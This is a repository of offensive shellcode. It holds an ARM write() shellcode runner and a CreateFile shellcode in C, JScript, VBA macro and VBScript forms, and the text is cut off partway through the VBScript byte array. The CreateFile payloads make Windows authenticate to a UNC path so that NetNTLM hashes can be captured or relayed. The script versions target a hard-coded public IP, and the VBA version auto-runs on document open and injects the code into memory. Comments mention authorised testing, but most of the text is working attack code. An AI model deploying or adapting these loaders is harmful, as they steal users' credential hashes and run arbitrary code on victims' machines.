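├── ARM-Write.c
├── CreateFile
│   ├── CreateFile.c
│   ├── CreateFile.js
│   ├── CreateFile.vba
│   └── CreateFile.vbs
├── Hosts.c
├── README.md
├── VBShellCode Demo
│   └── shellcode.exe
├── chmod777.c
├── desktopscroll.c
├── hosts.asm
├── invert.c
├── makedir.asm
├── makedir_decode.asm
├── mkdir.c
├── shutdown_x86.c
├── shutdown_x86_64.c
└── vhscroll.c

/ARM-Write.c:
--------------------------------------------------------------------------------
/*
# Title: Simple write() syscall on a Linux ARM architecture
# OS: armv6l GNU/Linux
# Tested on a Raspberry pi
# Author: Osanda Malith Jayathissa
# E-mail: osanda[cat]unseen.is

Disassembly of section .text:

00008054 <_start>:
    8054:   e28f6001    add r6, pc, #1
    8058:   e12fff16    bx  r6
    805c:   2207        movs    r2, #7
    805e:   4679        mov r1, pc
    8060:   310e        adds    r1, #14
    8062:   2001        movs    r0, #1
    8064:   2704        movs    r7, #4
    8066:   df01        svc 1
    8068:   1b24        subs    r4, r4, r4
    806a:   1c20        adds    r0, r4, #0
    806c:   2701        movs    r7, #1
    806e:   df01        svc 1
    8070:   6e61734f    cdpvs   3, 6, cr7, cr1, cr15, {2}
    8074:   000a6164    andeq   r6, sl, r4, ror #2
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/*
 * 23 bytes, no 0x00 byte. Enters in ARM state, switches to Thumb, then
 * write(1, "Osanda\n", 7) followed by exit(0). The string sits at the tail and
 * is located pc-relative (mov r1, pc / adds r1, #14), so the blob may be
 * copied anywhere as long as the start is 4-byte aligned for the ARM entry.
 */
static const unsigned char shellcode[] =
    "\x01\x60\x8f\xe2"      /* add  r6, pc, #1                 */
    "\x16\xff\x2f\xe1"      /* bx   r6          -> Thumb       */
    "\x07\x22"              /* movs r2, #7      (length)       */
    "\x79\x46"              /* mov  r1, pc                     */
    "\x0e\x31"              /* adds r1, #14     -> "Osanda\n"  */
    "\x01\x20"              /* movs r0, #1      (stdout)       */
    "\x04\x27"              /* movs r7, #4      (write)        */
    "\x01\xdf"              /* svc  1                          */
    "\x24\x1b"              /* subs r4, r4, r4  (r4 = 0)       */
    "\x20\x1c"              /* adds r0, r4, #0  (status 0)     */
    "\x01\x27"              /* movs r7, #1      (exit)         */
    "\x01\xdf"              /* svc  1                          */
    "\x4f\x73\x61\x6e"      /* "Osan"                          */
    "\x64\x61\x0a";         /* "da\n"                          */

/*
 * Copy the blob into a fresh RWX anonymous mapping and branch to it.
 *
 * A string literal lives in read-only, non-executable .rodata; calling it
 * directly (the classic harness) only worked when the binary was linked with
 * `-z execstack` and the kernel granted READ_IMPLIES_EXEC. A private RWX
 * mapping does not depend on linker flags or kernel version. The cache flush
 * is required on ARM: the bytes were written through the data side and must
 * be visible to instruction fetch before the branch.
 */
static void run_shellcode(const unsigned char *sc, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    memcpy(mem, sc, len);
    __builtin___clear_cache((char *)mem, (char *)mem + len);
    ((void (*)(void))mem)();
}

int main(void) {
    /* sizeof minus the implicit NUL. Equal to strlen() here because the blob
     * has no 0x00 byte, but this does not depend on that property. */
    const size_t len = sizeof shellcode - 1;

    fprintf(stdout, "Length: %zu\n", len);
    run_shellcode(shellcode, len);   /* the payload calls exit(0); not expected to return */
    return 0;
}

--------------------------------------------------------------------------------
/CreateFile/CreateFile.c:
--------------------------------------------------------------------------------
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Size: 368 Bytes
Description: This shellcode uses CreateFile and tries to read a non-existing
network path. You can use tools such as Responder to capture NetNTLM hashes.
The shellcode can be modified to steal hashes over the internet. SMBRelay
attacks can also be performed.

Review notes:
 - The 34-byte stub at the front (call $+4 / pop edi / ecx = 0x0202034c ^
   0x02020202 = 334) rewrites the rest of the blob in place, turning every
   0x05 placeholder into 0x00. That self-modification is why the page has to
   be PAGE_EXECUTE_READWRITE rather than execute-only.
 - This build ends in the bytes "//error/aa", i.e. the UNC path \\error\aa.
   Resolving the name "error" is what a poisoner such as Responder answers.
 - The .js/.vba/.vbs variants in this directory embed a public IP address
   (35.164.153.224) instead. Running those unmodified sends the current user's
   NetNTLM authentication to a host you do not control; point them at your
   own listener first, and only run any of this on systems you are authorised
   to test.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    /* A named array (not a pointer to a literal) so the length is known at
     * compile time and the bytes sit in writable .data. */
    static unsigned char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
        "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
        "\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
        "\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
        "\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
        "\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
        "\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
        "\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
        "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
        "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
        "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
        "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
        "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
        "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
        "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
        "\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
        "\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";

    /* Exclude the implicit NUL; 368 bytes, matching the header. Using sizeof
     * rather than strlen() means an embedded 0x00 could never truncate it. */
    const SIZE_T sc_len = sizeof shellcode - 1;
    DWORD oldProtect;

    /* RWX, not RX: the decoder stub writes the decoded bytes back in place. */
    if (!VirtualProtect(shellcode, sc_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
        return EXIT_FAILURE;
    }

    ((void (*)(void))shellcode)();

    /* Only reached if the payload returns; its final `push 0 / call esi`
     * appears to terminate the process, in which case this is skipped. */
    VirtualProtect(shellcode, sc_len, oldProtect, &oldProtect);

    return EXIT_SUCCESS;
}

--------------------------------------------------------------------------------
/CreateFile/CreateFile.js:
--------------------------------------------------------------------------------
/*
 * Author : Osanda Malith Jayathissa (@OsandaMalith)
 * Title: Shellcode to request a non-existing network path
 * Website: https://osandamalith.com
 * Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
 * Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
 *
 * Needs the third-party DynamicWrapperX COM server registered on the host.
 *
 * The 377-byte blob below ends in "//35.164.153.224/aa" (bytes 0x2f 0x2f
 * 0x33 0x35 ... 0x61 0x61): as shipped it makes the current user authenticate
 * to that public IP, which you do not control. Replace those bytes with your
 * own listener's address before running it.
 */
DX = new ActiveXObject("DynamicWrapperX");
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
DX.Register("kernel32.dll", "CreateThread", "i=uullu", "r=u");
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");

var MEM_COMMIT = 0x1000;
var PAGE_EXECUTE_READWRITE = 0x40;   // the stub decodes itself in place

var sc = [
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa,
0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0,
0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05,
0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e,
0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d,
0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b,
0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1,
0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b,
0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c,
0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b,
0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18,
0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c,
0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75,
0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7,
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];

var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
for (var i = 0; i < sc.length; i++) DX.NumPut(sc[i], scLocation, i);
var thread = DX.CreateThread(0, 0, scLocation, 0, 0);
// WaitForSingleObject is registered above but was never called. When the
// script ends the host process exits and the thread dies with it, possibly
// before the SMB request has gone out. INFINITE = 0xFFFFFFFF.
DX.WaitForSingleObject(thread, 0xFFFFFFFF);

--------------------------------------------------------------------------------
/CreateFile/CreateFile.vba: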
-------------------------------------------------------------------------------- 1 | ' Author : Osanda Malith Jayathissa (@OsandaMalith) 2 | ' Title: Shellcode to request a non-existing network path 3 | ' Website: https://osandamalith 4 | ' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html 5 | ' This is a word/excel macro. This can be used in vb6 applications as well 6 | 7 | #If Vba7 Then 8 | Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _ 9 | ByVal lpThreadAttributes As Long, _ 10 | ByVal dwStackSize As Long, _ 11 | ByVal lpStartAddress As LongPtr, _ 12 | lpParameter As Long, _ 13 | ByVal dwCreationFlags As Long, _ 14 | lpThreadId As Long) As LongPtr 15 | 16 | 17 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _ 18 | ByVal lpAddress As Long, _ 19 | ByVal dwSize As Long, _ 20 | ByVal flAllocationType As Long, _ 21 | ByVal flProtect As Long) As LongPtr 22 | 23 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _ 24 | ByVal Destination As LongPtr, _ 25 | ByRef Source As Any, _ 26 | ByVal Length As Long) As LongPtr 27 | 28 | #Else 29 | Private Declare Function CreateThread Lib "kernel32" ( _ 30 | ByVal lpThreadAttributes As Long, _ 31 | ByVal dwStackSize As Long, _ 32 | ByVal lpStartAddress As Long, _ 33 | lpParameter As Long, _ 34 | ByVal dwCreationFlags As Long, _ 35 | lpThreadId As Long) As Long 36 | 37 | Private Declare Function VirtualAlloc Lib "kernel32" ( _ 38 | ByVal lpAddress As Long, _ 39 | ByVal dwSize As Long, _ 40 | ByVal flAllocationType As Long, _ 41 | ByVal flProtect As Long) As Long 42 | 43 | Private Declare Function RtlMoveMemory Lib "kernel32" ( _ 44 | ByVal Destination As Long, _ 45 | ByRef Source As Any, _ 46 | ByVal Length As Long) As Long 47 | #EndIf 48 | 49 | Const MEM_COMMIT = &H1000 50 | Const PAGE_EXECUTE_READWRITE = &H40 51 | 52 | Sub Auto_Open() 53 | Dim source As Long, i As Long 54 | #If Vba7 Then 55 | Dim lpMemory As LongPtr, lResult As LongPtr 56 | #Else 
57 | Dim lpMemory As Long, lResult As Long 58 | #EndIf 59 | 60 | Dim bShellcode(376) As Byte 61 | bShellcode(0) = 232 62 | bShellcode(1) = 255 63 | bShellcode(2) = 255 64 | bShellcode(3) = 255 65 | bShellcode(4) = 255 66 | bShellcode(5) = 192 67 | bShellcode(6) = 95 68 | bShellcode(7) = 185 69 | bShellcode(8) = 85 70 | bShellcode(9) = 3 71 | bShellcode(10) = 2 72 | bShellcode(11) = 2 73 | bShellcode(12) = 129 74 | bShellcode(13) = 241 75 | bShellcode(14) = 2 76 | bShellcode(15) = 2 77 | bShellcode(16) = 2 78 | bShellcode(17) = 2 79 | bShellcode(18) = 131 80 | bShellcode(19) = 199 81 | bShellcode(20) = 29 82 | bShellcode(21) = 51 83 | bShellcode(22) = 246 84 | bShellcode(23) = 252 85 | bShellcode(24) = 138 86 | bShellcode(25) = 7 87 | bShellcode(26) = 60 88 | bShellcode(27) = 5 89 | bShellcode(28) = 15 90 | bShellcode(29) = 68 91 | bShellcode(30) = 198 92 | bShellcode(31) = 170 93 | bShellcode(32) = 226 94 | bShellcode(33) = 246 95 | bShellcode(34) = 232 96 | bShellcode(35) = 5 97 | bShellcode(36) = 5 98 | bShellcode(37) = 5 99 | bShellcode(38) = 5 100 | bShellcode(39) = 94 101 | bShellcode(40) = 139 102 | bShellcode(41) = 254 103 | bShellcode(42) = 129 104 | bShellcode(43) = 198 105 | bShellcode(44) = 41 106 | bShellcode(45) = 1 107 | bShellcode(46) = 5 108 | bShellcode(47) = 5 109 | bShellcode(48) = 185 110 | bShellcode(49) = 2 111 | bShellcode(50) = 5 112 | bShellcode(51) = 5 113 | bShellcode(52) = 5 114 | bShellcode(53) = 252 115 | bShellcode(54) = 173 116 | bShellcode(55) = 1 117 | bShellcode(56) = 60 118 | bShellcode(57) = 7 119 | bShellcode(58) = 226 120 | bShellcode(59) = 250 121 | bShellcode(60) = 86 122 | bShellcode(61) = 185 123 | bShellcode(62) = 141 124 | bShellcode(63) = 16 125 | bShellcode(64) = 183 126 | bShellcode(65) = 248 127 | bShellcode(66) = 232 128 | bShellcode(67) = 95 129 | bShellcode(68) = 5 130 | bShellcode(69) = 5 131 | bShellcode(70) = 5 132 | bShellcode(71) = 104 133 | bShellcode(72) = 49 134 | bShellcode(73) = 1 135 | bShellcode(74) = 
5 136 | bShellcode(75) = 5 137 | bShellcode(76) = 255 138 | bShellcode(77) = 208 139 | bShellcode(78) = 185 140 | bShellcode(79) = 224 141 | bShellcode(80) = 83 142 | bShellcode(81) = 49 143 | bShellcode(82) = 75 144 | bShellcode(83) = 232 145 | bShellcode(84) = 78 146 | bShellcode(85) = 5 147 | bShellcode(86) = 5 148 | bShellcode(87) = 5 149 | bShellcode(88) = 185 150 | bShellcode(89) = 172 151 | bShellcode(90) = 213 152 | bShellcode(91) = 170 153 | bShellcode(92) = 136 154 | bShellcode(93) = 139 155 | bShellcode(94) = 240 156 | bShellcode(95) = 232 157 | bShellcode(96) = 66 158 | bShellcode(97) = 5 159 | bShellcode(98) = 5 160 | bShellcode(99) = 5 161 | bShellcode(100) = 106 162 | bShellcode(101) = 5 163 | bShellcode(102) = 104 164 | bShellcode(103) = 128 165 | bShellcode(104) = 5 166 | bShellcode(105) = 5 167 | bShellcode(106) = 5 168 | bShellcode(107) = 106 169 | bShellcode(108) = 3 170 | bShellcode(109) = 106 171 | bShellcode(110) = 5 172 | bShellcode(111) = 106 173 | bShellcode(112) = 1 174 | bShellcode(113) = 104 175 | bShellcode(114) = 5 176 | bShellcode(115) = 5 177 | bShellcode(116) = 5 178 | bShellcode(117) = 128 179 | bShellcode(118) = 104 180 | bShellcode(119) = 62 181 | bShellcode(120) = 1 182 | bShellcode(121) = 5 183 | bShellcode(122) = 5 184 | bShellcode(123) = 255 185 | bShellcode(124) = 208 186 | bShellcode(125) = 106 187 | bShellcode(126) = 5 188 | bShellcode(127) = 255 189 | bShellcode(128) = 214 190 | bShellcode(129) = 51 191 | bShellcode(130) = 192 192 | bShellcode(131) = 94 193 | bShellcode(132) = 195 194 | bShellcode(133) = 51 195 | bShellcode(134) = 210 196 | bShellcode(135) = 235 197 | bShellcode(136) = 16 198 | bShellcode(137) = 193 199 | bShellcode(138) = 202 200 | bShellcode(139) = 13 201 | bShellcode(140) = 60 202 | bShellcode(141) = 97 203 | bShellcode(142) = 15 204 | bShellcode(143) = 190 205 | bShellcode(144) = 192 206 | bShellcode(145) = 124 207 | bShellcode(146) = 3 208 | bShellcode(147) = 131 209 | bShellcode(148) = 232 210 | 
bShellcode(149) = 32 211 | bShellcode(150) = 3 212 | bShellcode(151) = 208 213 | bShellcode(152) = 65 214 | bShellcode(153) = 138 215 | bShellcode(154) = 1 216 | bShellcode(155) = 132 217 | bShellcode(156) = 192 218 | bShellcode(157) = 117 219 | bShellcode(158) = 234 220 | bShellcode(159) = 139 221 | bShellcode(160) = 194 222 | bShellcode(161) = 195 223 | bShellcode(162) = 141 224 | bShellcode(163) = 65 225 | bShellcode(164) = 248 226 | bShellcode(165) = 195 227 | bShellcode(166) = 85 228 | bShellcode(167) = 139 229 | bShellcode(168) = 236 230 | bShellcode(169) = 131 231 | bShellcode(170) = 236 232 | bShellcode(171) = 20 233 | bShellcode(172) = 83 234 | bShellcode(173) = 86 235 | bShellcode(174) = 87 236 | bShellcode(175) = 137 237 | bShellcode(176) = 77 238 | bShellcode(177) = 244 239 | bShellcode(178) = 100 240 | bShellcode(179) = 161 241 | bShellcode(180) = 48 242 | bShellcode(181) = 5 243 | bShellcode(182) = 5 244 | bShellcode(183) = 5 245 | bShellcode(184) = 137 246 | bShellcode(185) = 69 247 | bShellcode(186) = 252 248 | bShellcode(187) = 139 249 | bShellcode(188) = 69 250 | bShellcode(189) = 252 251 | bShellcode(190) = 139 252 | bShellcode(191) = 64 253 | bShellcode(192) = 12 254 | bShellcode(193) = 139 255 | bShellcode(194) = 64 256 | bShellcode(195) = 20 257 | bShellcode(196) = 137 258 | bShellcode(197) = 69 259 | bShellcode(198) = 236 260 | bShellcode(199) = 139 261 | bShellcode(200) = 248 262 | bShellcode(201) = 139 263 | bShellcode(202) = 207 264 | bShellcode(203) = 232 265 | bShellcode(204) = 210 266 | bShellcode(205) = 255 267 | bShellcode(206) = 255 268 | bShellcode(207) = 255 269 | bShellcode(208) = 139 270 | bShellcode(209) = 112 271 | bShellcode(210) = 24 272 | bShellcode(211) = 139 273 | bShellcode(212) = 63 274 | bShellcode(213) = 133 275 | bShellcode(214) = 246 276 | bShellcode(215) = 116 277 | bShellcode(216) = 79 278 | bShellcode(217) = 139 279 | bShellcode(218) = 70 280 | bShellcode(219) = 60 281 | bShellcode(220) = 139 282 | bShellcode(221) 
= 92 283 | bShellcode(222) = 48 284 | bShellcode(223) = 120 285 | bShellcode(224) = 133 286 | bShellcode(225) = 219 287 | bShellcode(226) = 116 288 | bShellcode(227) = 68 289 | bShellcode(228) = 139 290 | bShellcode(229) = 76 291 | bShellcode(230) = 51 292 | bShellcode(231) = 12 293 | bShellcode(232) = 3 294 | bShellcode(233) = 206 295 | bShellcode(234) = 232 296 | bShellcode(235) = 150 297 | bShellcode(236) = 255 298 | bShellcode(237) = 255 299 | bShellcode(238) = 255 300 | bShellcode(239) = 139 301 | bShellcode(240) = 76 302 | bShellcode(241) = 51 303 | bShellcode(242) = 32 304 | bShellcode(243) = 137 305 | bShellcode(244) = 69 306 | bShellcode(245) = 248 307 | bShellcode(246) = 51 308 | bShellcode(247) = 192 309 | bShellcode(248) = 3 310 | bShellcode(249) = 206 311 | bShellcode(250) = 137 312 | bShellcode(251) = 77 313 | bShellcode(252) = 240 314 | bShellcode(253) = 137 315 | bShellcode(254) = 69 316 | bShellcode(255) = 252 317 | bShellcode(256) = 57 318 | bShellcode(257) = 68 319 | bShellcode(258) = 51 320 | bShellcode(259) = 24 321 | bShellcode(260) = 118 322 | bShellcode(261) = 34 323 | bShellcode(262) = 139 324 | bShellcode(263) = 12 325 | bShellcode(264) = 129 326 | bShellcode(265) = 3 327 | bShellcode(266) = 206 328 | bShellcode(267) = 232 329 | bShellcode(268) = 117 330 | bShellcode(269) = 255 331 | bShellcode(270) = 255 332 | bShellcode(271) = 255 333 | bShellcode(272) = 3 334 | bShellcode(273) = 69 335 | bShellcode(274) = 248 336 | bShellcode(275) = 57 337 | bShellcode(276) = 69 338 | bShellcode(277) = 244 339 | bShellcode(278) = 116 340 | bShellcode(279) = 28 341 | bShellcode(280) = 139 342 | bShellcode(281) = 69 343 | bShellcode(282) = 252 344 | bShellcode(283) = 139 345 | bShellcode(284) = 77 346 | bShellcode(285) = 240 347 | bShellcode(286) = 64 348 | bShellcode(287) = 137 349 | bShellcode(288) = 69 350 | bShellcode(289) = 252 351 | bShellcode(290) = 59 352 | bShellcode(291) = 68 353 | bShellcode(292) = 51 354 | bShellcode(293) = 24 355 | 
bShellcode(294) = 114 356 | bShellcode(295) = 222 357 | bShellcode(296) = 59 358 | bShellcode(297) = 125 359 | bShellcode(298) = 236 360 | bShellcode(299) = 117 361 | bShellcode(300) = 156 362 | bShellcode(301) = 51 363 | bShellcode(302) = 192 364 | bShellcode(303) = 95 365 | bShellcode(304) = 94 366 | bShellcode(305) = 91 367 | bShellcode(306) = 201 368 | bShellcode(307) = 195 369 | bShellcode(308) = 139 370 | bShellcode(309) = 77 371 | bShellcode(310) = 252 372 | bShellcode(311) = 139 373 | bShellcode(312) = 68 374 | bShellcode(313) = 51 375 | bShellcode(314) = 36 376 | bShellcode(315) = 141 377 | bShellcode(316) = 4 378 | bShellcode(317) = 72 379 | bShellcode(318) = 15 380 | bShellcode(319) = 183 381 | bShellcode(320) = 12 382 | bShellcode(321) = 48 383 | bShellcode(322) = 139 384 | bShellcode(323) = 68 385 | bShellcode(324) = 51 386 | bShellcode(325) = 28 387 | bShellcode(326) = 141 388 | bShellcode(327) = 4 389 | bShellcode(328) = 136 390 | bShellcode(329) = 139 391 | bShellcode(330) = 4 392 | bShellcode(331) = 48 393 | bShellcode(332) = 3 394 | bShellcode(333) = 198 395 | bShellcode(334) = 235 396 | bShellcode(335) = 223 397 | bShellcode(336) = 33 398 | bShellcode(337) = 5 399 | bShellcode(338) = 5 400 | bShellcode(339) = 5 401 | bShellcode(340) = 80 402 | bShellcode(341) = 5 403 | bShellcode(342) = 5 404 | bShellcode(343) = 5 405 | bShellcode(344) = 107 406 | bShellcode(345) = 101 407 | bShellcode(346) = 114 408 | bShellcode(347) = 110 409 | bShellcode(348) = 101 410 | bShellcode(349) = 108 411 | bShellcode(350) = 51 412 | bShellcode(351) = 50 413 | bShellcode(352) = 46 414 | bShellcode(353) = 100 415 | bShellcode(354) = 108 416 | bShellcode(355) = 108 417 | bShellcode(356) = 5 418 | bShellcode(357) = 47 419 | bShellcode(358) = 47 420 | bShellcode(359) = 51 421 | bShellcode(360) = 53 422 | bShellcode(361) = 46 423 | bShellcode(362) = 49 424 | bShellcode(363) = 54 425 | bShellcode(364) = 52 426 | bShellcode(365) = 46 427 | bShellcode(366) = 49 428 | 
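bShellcode(367) = 53
bShellcode(368) = 51
bShellcode(369) = 46
bShellcode(370) = 50
bShellcode(371) = 50
bShellcode(372) = 52
bShellcode(373) = 47
bShellcode(374) = 97
bShellcode(375) = 97
bShellcode(376) = 5

    ' Bytes 357-375 spell "//35.164.153.224/aa": a hard-coded public IP, so as
    ' shipped the macro makes the current user authenticate to a host you do
    ' not control. Replace them with your own listener's address before use.
    '
    ' Size: bShellcode is declared (376), i.e. 377 elements, and the loop
    ' copies all of them; UBound alone is one byte short of that.
    lpMemory = VirtualAlloc(0, UBound(bShellcode) - LBound(bShellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    For i = LBound(bShellcode) To UBound(bShellcode)
        source = bShellcode(i)
        lResult = RtlMoveMemory(lpMemory + i, source, 1)
    Next i
    lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

--------------------------------------------------------------------------------
/CreateFile/CreateFile.vbs:
--------------------------------------------------------------------------------
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith.com
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
'
' Needs the third-party DynamicWrapperX COM server registered on the host.
' The blob ends in "//35.164.153.224/aa" (&H2f, &H2f, &H33, &H35 ...): a
' hard-coded public IP. Replace it with your own listener before running.

Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
DX.Register "kernel32.dll", "CreateThread", "i=uullu", "r=u"
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"

Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40   ' the stub decodes itself in place

shellcode = Array( _
&He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _
&H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _
&H8b, &Hfe, &H81, &Hc6, &H29, &H01, &H05, &H05, &Hb9, &H02, &H05, &H05, &H05, &Hfc, &Had, &H01, &H3c, &H07, &He2, &Hfa, _
&H56, &Hb9, &H8d, &H10, &Hb7, &Hf8, &He8, &H5f, &H05, &H05, &H05, &H68, &H31, &H01, &H05, &H05, &Hff, &Hd0, &Hb9, &He0, _
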